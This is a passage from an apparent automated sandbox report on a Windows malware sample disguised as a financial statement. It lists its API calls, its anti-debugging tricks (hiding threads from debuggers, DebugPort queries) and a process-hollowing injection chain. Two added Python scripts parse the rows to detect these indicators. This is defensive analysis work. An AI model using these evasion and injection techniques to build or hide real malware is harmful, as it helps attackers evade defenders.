ng@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t25_2_00410586
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$a
llocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$ba
sic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA25_2_0040477E
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00403325
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 25_2_00412BEE
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha7_2_00403C4A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread delayed: delay time: 922337203685477
          Source: WerFault.exe, 0000001F.00000002.759195897.00000000045BC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWU
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 0000000C.00000002.697391962.0000000004D30000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.758803849.0000000004490000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.771683997.0000000004E04000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 0000001F.00000002.759152587.0000000004590000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information queried: ProcessInformation

          Anti Debugging:

          Contains functionality to hide a thread from the debugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014EBC60 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,014ECDB7,00000000,0000000015_2_014EBC60
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebugger (12 occurrences)
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger (36 occurrences)
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess queried: DebugPort (2 occurrences)
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPort (4 occurrences)
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00409908
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess token adjusted: Debug (3 occurrences)
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeMemory allocated: page read and write | page guard
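          The anti-debugging signatures in this section rest on a few observables: an NtSetInformationThread call whose second argument is 00000011 (THREADINFOCLASS ThreadHideFromDebugger, 0x11), the repeated HideFromDebugger thread-information events that call produces at runtime, DebugPort queries (NtQueryInformationProcess with ProcessDebugPort) and the Debug token adjustment (SeDebugPrivilege). The Python below is an added example and not part of the Joe Sandbox report: it parses rows in this page's own layout (the Source cell fused to the detail cell, the function id fused onto the last argument) and produces a per-image anti-debug summary. The sample rows are copied from this section, except the second row, which is a constructed call with an unresolved "?" info class to show that such arguments are skipped rather than misclassified; the "Jump to behavior" link text some rows carry is stripped before parsing.

```python
import json
import re
from collections import Counter

# THREADINFOCLASS value that makes NtSetInformationThread detach the calling
# thread from any attached debugger (ThreadHideFromDebugger == 0x11).
THREAD_HIDE_FROM_DEBUGGER = 0x11

# Runtime events the report labels as anti-debug, with the value that matters.
ANTI_DEBUG_EVENTS = {
    "Thread information set": "HideFromDebugger",  # NtSetInformationThread(0x11)
    "Process queried": "DebugPort",                 # NtQueryInformationProcess(ProcessDebugPort)
    "Process token adjusted": "Debug",              # SeDebugPrivilege enabled via AdjustTokenPrivileges
}

# "Code function: <id> <api> <args><id>": the report fuses the function id
# onto the last argument, so the id captured at the front is stripped again.
CODE_FUNC_RE = re.compile(
    r"Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]{8}) (?P<api>\w+) (?P<args>\S*)")
EVENT_RE = re.compile(
    r"Source: (?P<proc>\S+?\.exe)(?P<event>Thread information set|Process queried"
    r"|Process token adjusted): (?P<value>\w+)")


def parse_code_function(row):
    """Return (function_id, api_name, [hex args]) or None if the row is not a call entry."""
    m = CODE_FUNC_RE.search(row)
    if not m:
        return None
    fid, args = m.group("fid"), m.group("args")
    if args.endswith(fid):
        args = args[: -len(fid)]
    return fid, m.group("api"), [a for a in args.split(",") if a]


def hide_from_debugger_calls(rows):
    """Function ids whose NtSetInformationThread call passes ThreadHideFromDebugger."""
    hits = []
    for row in rows:
        parsed = parse_code_function(row)
        if parsed is None:
            continue
        fid, api, args = parsed
        if api != "NtSetInformationThread" or len(args) < 2:
            continue
        try:
            info_class = int(args[1], 16)
        except ValueError:
            continue  # "?" means the sandbox could not resolve the argument
        if info_class == THREAD_HIDE_FROM_DEBUGGER:
            hits.append(fid)
    return hits


def anti_debug_events(rows):
    """Count suspicious runtime events per (image name, event label)."""
    counts = Counter()
    for row in rows:
        m = EVENT_RE.search(row.replace("Jump to behavior", ""))
        if m and ANTI_DEBUG_EVENTS.get(m.group("event")) == m.group("value"):
            image = m.group("proc").rsplit("\\", 1)[-1]
            counts[(image, m.group("event") + ": " + m.group("value"))] += 1
    return counts


def summarize(rows):
    """Hide-thread call sites plus counted runtime events, grouped by image."""
    events = {}
    for (image, event), n in sorted(anti_debug_events(rows).items()):
        events.setdefault(image, {})[event] = n
    return {"hide_thread_call_sites": hide_from_debugger_calls(rows), "events": events}


# Constructed sample in the report's row layout; rows 1 and 3-8 are copied from
# this section, row 2 is made up to exercise the unresolved-argument path.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014EBC60 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,014ECDB7,00000000,0000000015_2_014EBC60",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014EBD10 NtSetInformationThread ?,?,?,?15_2_014EBD10",
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior",
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPort",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess token adjusted: Debug",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information queried: ProcessInformation",
]

if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_ROWS), indent=2))
```

          The info-class check is the one that matters for triage: many legitimate programs query ProcessDebugPort or enable SeDebugPrivilege, but an NtSetInformationThread with class 0x11 has no purpose other than blinding a debugger, so the call-site list is the highest-confidence output of the script.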

          HIPS / PFW / Operating System Protection Evasion:

          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,7_2_0040F219
          Injects a PE file into a foreign process
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: unknown base: 400000 value starts with: 4D5A
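          Entry 7_2_0040F219 is the textbook process-hollowing (RunPE) chain: create the child, take its thread context, allocate and write into it, set the context, resume. The "Memory written ... base: 400000 value starts with: 4D5A" rows are that write observed at runtime, a full PE image (MZ signature) landing at the default 32-bit image base of another process. The Python below is an added example, not part of the report, that matches the chain as an ordered subsequence (so the interleaved CloseHandle, VirtualAlloc and ReadProcessMemory calls in this entry do not break it) and pairs the result with the MZ-write rows. It generalises beyond this sample by accepting the Nt*/Wow64* variants of each step; those aliases are an assumption about other samples and do not appear on this page. The first and last three sample rows are copied from this section; the second row is a constructed benign call list used as a negative case.

```python
import re

# Each step of the hollowing chain with the API names that implement it. Only
# the Win32 names appear in this report; the Nt*/Wow64* aliases are assumed.
HOLLOWING_CHAIN = (
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread", "NtResumeThread"},
)
DEFAULT_IMAGE_BASE_32 = 0x400000

# "Code function: <id> <api list><id>": the id is repeated at the end of the row.
CODE_FUNC_RE = re.compile(
    r"Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]{8}) (?P<body>.*?)(?P=fid)$")
MEM_WRITE_RE = re.compile(
    r"Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)")


def api_calls(row):
    """(function id, [api names]) for a 'Code function:' row, else (None, [])."""
    m = CODE_FUNC_RE.search(row.strip())
    if not m:
        return None, []
    return m.group("fid"), [c.strip() for c in m.group("body").split(",") if c.strip()]


def matches_chain(calls, chain=HOLLOWING_CHAIN):
    """True when every step of chain occurs in calls in that order; gaps are allowed."""
    step = 0
    for api in calls:
        if api in chain[step]:
            step += 1
            if step == len(chain):
                return True
    return False


def hollowing_call_sites(rows):
    """Function ids whose call list contains the full hollowing chain."""
    return [fid for fid, calls in map(api_calls, rows) if fid and matches_chain(calls)]


def pe_image_writes(rows):
    """(target image, base) for cross-process writes that begin with the MZ signature."""
    hits = []
    for row in rows:
        m = MEM_WRITE_RE.search(row)
        if m and m.group("magic").upper().startswith("4D5A"):
            target = m.group("target").rsplit("\\", 1)[-1]
            hits.append((target, int(m.group("base"), 16)))
    return hits


def triage(rows):
    """Static capability plus runtime evidence: both together confirm hollowing."""
    sites = hollowing_call_sites(rows)
    writes = pe_image_writes(rows)
    return {
        "hollowing_call_sites": sites,
        "pe_writes": writes,
        "confirmed": bool(sites) and any(b == DEFAULT_IMAGE_BASE_32 for _, b in writes),
    }


# Constructed sample: rows 1 and 3-5 copied from this section, row 2 made up.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,7_2_0040F219",
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00401000 CreateProcessW,WaitForSingleObject,CloseHandle,7_2_00401000",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5AJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: unknown base: 400000 value starts with: 4D5A",
]

if __name__ == "__main__":
    print(triage(SAMPLE_ROWS))
```

          The "unknown" target in the last row is kept deliberately: when the sandbox cannot name the written process the write is still a full PE at 0x400000, which is exactly the case an analyst must not filter out.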
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@